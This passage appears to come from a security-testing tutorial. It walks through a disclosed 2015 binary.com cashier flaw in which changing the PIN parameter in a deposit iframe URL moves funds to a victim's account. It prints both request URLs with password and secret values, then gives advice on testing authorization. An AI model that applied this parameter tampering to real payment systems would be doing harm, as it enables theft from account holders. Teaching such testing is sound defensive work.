On November 14^th, 2015, Mahmoud G., published a vulnerability that allowed him to steal money from accounts in binary.com by modifying one parameter in a request.

Mahmoud G. created two accounts in the application, and then logged into them in two different web browsers. Once logged in, he used the first one to deposit money by using the cashier option in the application. The transaction generated this call:

<iframe src="https://cashier.binary.com/login.asp?Sportsbook=Binary (CR) SA USD&amp;PIN=CR342435&amp;Lang=en&amp;Password=0e552ae717a1d08cb147f132a31676559e3273ef&amp;Secret=1328d47abeda2b672b6424093c4dbc76&amp;Action=DEPOSIT" frameborder="0" width="100%" height="2000" id="cashiercont" scrolling="auto" style="padding:0px;margin:0px;"></iframe>
  

In this frame, the PIN parameter is used to identify the user who will receive the deposit. So, in the other browser, Mahmoud G. modified the PIN in the request so that the second account received the money, instead of the first one. The result is as follows:

<iframe src="https://cashier.binary.com/login.asp?Sportsbook=Binary (CR) SA USD&amp;PIN=<VICTIM_ACCOUNT_ID>&amp;Lang=en&amp;Password=0e552ae717a1d08cb147f132a31676559e3273ef&amp;Secret=1328d47abeda2b672b6424093c4dbc76&amp;Action=DEPOSIT" frameborder="0" width="100%" height="2000" id="cashiercont" scrolling="auto" style="padding:0px;margin:0px;"></iframe>
  

To identify this type of vulnerability, you need to make a note of the following:

• Analyze each application's feature using at least two users of each authorization level that the application has.
• Analyze all the requests using an HTTP proxy and try to determine what each parameter is doing and the value used by the application. Pay special attention to variables that are being used as control flow variables.